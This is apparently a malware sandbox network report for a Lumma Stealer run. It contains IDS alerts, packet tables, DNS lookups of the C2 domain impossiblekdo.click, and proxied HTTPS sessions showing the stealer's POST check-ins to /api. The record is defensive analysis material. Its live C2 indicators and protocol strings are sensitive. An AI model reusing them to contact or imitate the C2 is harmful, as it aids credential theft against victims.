2025-01-05T19:38:13.008492+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	188.114.97.3	443	TCP
2025-01-05T19:38:14.168234+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	188.114.97.3	443	TCP
2025-01-05T19:38:14.600117+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49713	188.114.97.3	443	TCP
2025-01-05T19:38:15.402133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	188.114.97.3	443	TCP
2025-01-05T19:38:17.505331+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49719	188.114.97.3	443	TCP
2025-01-05T19:38:18.011775+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49719	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:37:53.201400995 CET	49675	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:37:53.201406956 CET	49674	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:37:53.310771942 CET	49673	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:38:02.810756922 CET	49674	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:38:02.810760021 CET	49675	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:38:02.920146942 CET	49673	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:38:04.586983919 CET	443	49706	23.1.237.91	192.168.2.5
Jan 5, 2025 19:38:04.587090969 CET	49706	443	192.168.2.5	23.1.237.91
Jan 5, 2025 19:38:08.103163958 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.103200912 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:08.103272915 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.104337931 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.104348898 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:08.595128059 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:08.595191956 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.599215031 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.599224091 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:08.599462032 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:08.638880968 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.649085045 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.649111032 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:08.649189949 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.073092937 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.073203087 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.073251009 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.074609041 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.074620008 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.074642897 CET	49707	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.074646950 CET	443	49707	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.083750010 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.083779097 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.083858013 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.084161043 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.084172964 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.550230980 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.550373077 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.551820040 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.551830053 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.552053928 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:09.555032015 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.555056095 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:09.555094957 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036350012 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036420107 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036444902 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036477089 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036511898 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.036523104 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036552906 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.036560059 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036583900 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.036627054 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.036632061 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.037082911 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.037225008 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.041047096 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.041079998 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.041114092 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.041120052 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.041157007 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.231904030 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.231957912 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.232022047 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.232052088 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.232098103 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.248116016 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.248126984 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.248147011 CET	49708	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.248152018 CET	443	49708	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.402297974 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.402350903 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.402445078 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.402753115 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.402769089 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.858711004 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.858772993 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.861159086 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.861171007 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.861371040 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:10.862584114 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.862731934 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:10.862765074 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.431690931 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.431773901 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.431848049 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.432099104 CET	49709	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.432120085 CET	443	49709	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.460633039 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.460664034 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.460766077 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.461061954 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.461078882 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.920734882 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.920830011 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.922338963 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.922347069 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.922552109 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.923801899 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.923965931 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.923993111 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:11.924047947 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:11.924053907 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:12.472415924 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:12.472479105 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:12.472656012 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:12.472726107 CET	49710	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:12.472738028 CET	443	49710	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:12.532147884 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:12.532192945 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:12.532390118 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:12.532617092 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:12.532629967 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.008322001 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.008491993 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.010109901 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.010121107 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.010338068 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.011575937 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.011719942 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.011754036 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.011830091 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.011838913 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.636019945 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.636111021 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.636164904 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.636405945 CET	49711	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.636414051 CET	443	49711	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.710942030 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.710958004 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:13.711031914 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.711257935 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:13.711272001 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.168051958 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.168234110 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.169245005 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.169254065 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.169457912 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.170547962 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.170623064 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.170629025 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.600127935 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.600217104 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.600456953 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.600512028 CET	49713	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.600526094 CET	443	49713	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.917665958 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.917701006 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:14.917823076 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.918235064 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:14.918247938 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.402050972 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.402132988 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.403358936 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.403371096 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.403595924 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.410434961 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411235094 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411264896 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.411434889 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411464930 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.411565065 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411592007 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.411727905 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411752939 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.411873102 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.411904097 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.412043095 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.412074089 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.412081957 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.412096977 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.412234068 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.412256956 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.412276983 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.412390947 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.412415981 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.421386003 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.421560049 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.421588898 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:15.421608925 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.421643019 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.421694040 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:15.426105976 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.028368950 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.028460979 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.028593063 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.033602953 CET	49717	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.033617973 CET	443	49717	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.047231913 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.047245979 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.047301054 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.047619104 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.047631025 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.505255938 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.505331039 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.507277966 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.507282019 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.507512093 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:17.516587019 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.516587019 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:17.516645908 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011792898 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011837959 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011872053 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011907101 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.011924028 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011961937 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.011970997 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.011976957 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012025118 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.012031078 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012113094 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012149096 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012164116 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.012168884 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012204885 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.012209892 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.012963057 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.013091087 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.014087915 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.014098883 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:18.014115095 CET	49719	443	192.168.2.5	188.114.97.3
Jan 5, 2025 19:38:18.014120102 CET	443	49719	188.114.97.3	192.168.2.5
Jan 5, 2025 19:38:41.201560020 CET	49704	80	192.168.2.5	104.18.38.233
Jan 5, 2025 19:38:41.201610088 CET	49705	80	192.168.2.5	192.229.211.108
Jan 5, 2025 19:38:41.201657057 CET	49703	80	192.168.2.5	104.18.38.233
Jan 5, 2025 19:38:41.206608057 CET	80	49704	104.18.38.233	192.168.2.5
Jan 5, 2025 19:38:41.206666946 CET	49704	80	192.168.2.5	104.18.38.233
Jan 5, 2025 19:38:41.207142115 CET	80	49705	192.229.211.108	192.168.2.5
Jan 5, 2025 19:38:41.207153082 CET	80	49703	104.18.38.233	192.168.2.5
Jan 5, 2025 19:38:41.207192898 CET	49705	80	192.168.2.5	192.229.211.108
Jan 5, 2025 19:38:41.207200050 CET	49703	80	192.168.2.5	104.18.38.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:38:08.082804918 CET	50546	53	192.168.2.5	1.1.1.1
Jan 5, 2025 19:38:08.097824097 CET	53	50546	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 19:38:08.082804918 CET	192.168.2.5	1.1.1.1	0x8d9d	Standard query (0)	impossiblekdo.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 19:38:08.097824097 CET	1.1.1.1	192.168.2.5	0x8d9d	No error (0)	impossiblekdo.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:08.097824097 CET	1.1.1.1	192.168.2.5	0x8d9d	No error (0)	impossiblekdo.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.35	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.42	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.38	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.18	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.22	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.43	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.36	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:13.891189098 CET	1.1.1.1	192.168.2.5	0xcb91	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.23	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:14.823538065 CET	1.1.1.1	192.168.2.5	0x82b8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 19:38:14.823538065 CET	1.1.1.1	192.168.2.5	0x82b8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:38:17.051193953 CET	1.1.1.1	192.168.2.5	0x8d3	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 5, 2025 19:38:17.051193953 CET	1.1.1.1	192.168.2.5	0x8d3	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

impossiblekdo.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:08 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: impossiblekdo.click
2025-01-05 18:38:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:38:09 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4hinbce32e4hd4tq8jqirulkce; expires=Thu, 01 May 2025 12:24:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTTJ2BI7pCcYrHlmV%2F8bjpcO7hGWA4kwW%2FM14hFRQGZzjIUiFhY6dYCqc%2F5c8gKFrqRBEZ5aZg22lPI%2FKOLYo8SdErv%2Fo6Tuob7iDR9Yh19su7Rf%2BtLoO%2BmpgA9cIP7l3MRygpjr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd595685a090cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1742&rtt_var=660&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1650650&cwnd=230&unsent_bytes=0&cid=8d2b74e18cfb0d21&ts=491&x=0"
2025-01-05 18:38:09 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:38:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	188.114.97.3	443	7100	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:38:09 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: impossiblekdo.click
2025-01-05 18:38:09 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6f 68 64 62 6b 6f 79 67 76 76 65 65 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--ohdbkoygvvee&j=
2025-01-05 18:38:10 UTC	1125	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:38:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=52ucmauf74uhvjntva9qg73a85; expires=Thu, 01 May 2025 12:24:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjxHVc2%2FA47FNlCeyolE8wgSSoANq07zgtxYZ5JXpwhQVHs17IC3VPMQIFYqbgGYwoktsMwUO75VYAFq3E5N1SHXLv%2BT5COweIspwUm6xLYDlXGUe8pktPZrKyjqw0M%2FtbQSNLQl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd5956e3d7341fb-EWR alt-svc: h3=":443"; ma=86400 